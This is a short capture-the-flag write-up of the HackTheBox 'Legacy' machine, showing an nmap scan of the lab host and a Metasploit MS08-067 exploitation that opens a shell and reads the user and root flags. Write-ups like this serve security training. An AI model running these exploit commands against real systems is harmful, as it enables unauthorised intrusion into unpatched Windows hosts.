---
title: HackTheBox - Legacy
author: Devin Cudnohufsky
date: 2021-05-02 00:00:00 +0500
categories: [Write-Ups]
tags: [nmap, conficker]
---

## Enumeration

### Port Scan

```
$ cat nmap/initial.nmap               
# Nmap 7.91 scan initiated Wed Feb 17 20:35:39 2021 as: nmap -sC -sV -oA nmap/initial 10.129.100.11
Nmap scan report for 10.129.100.11
Host is up (0.079s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h57m41s, deviation: 1h24m51s, median: 4d23h57m41s
|_nbstat: NetBIOS name: nil, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:56:9b (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2021-02-23T05:33:34+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 20:36:43 2021 -- 1 IP address (1 host up) scanned in 64.06 seconds
```

## Exploitation

### Search

```
$ msfdb start
$ msfconsole
msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
```

### Exploit 

```

msf6 > use windows/smb/ms08_067_netapi
msf6 > set RHOSTS 10.129.100.11
msf6 > set LHOST 10.10.14.146
msf6 > exploit
shell
$ cd C:\Documents and Settings\john\Desktop>
```
> User Flag: `type user.txt`

```
$ cd C:\Documents and Settings\Administrator\Desktop>
```
 
> Root Flag: `type root.txt`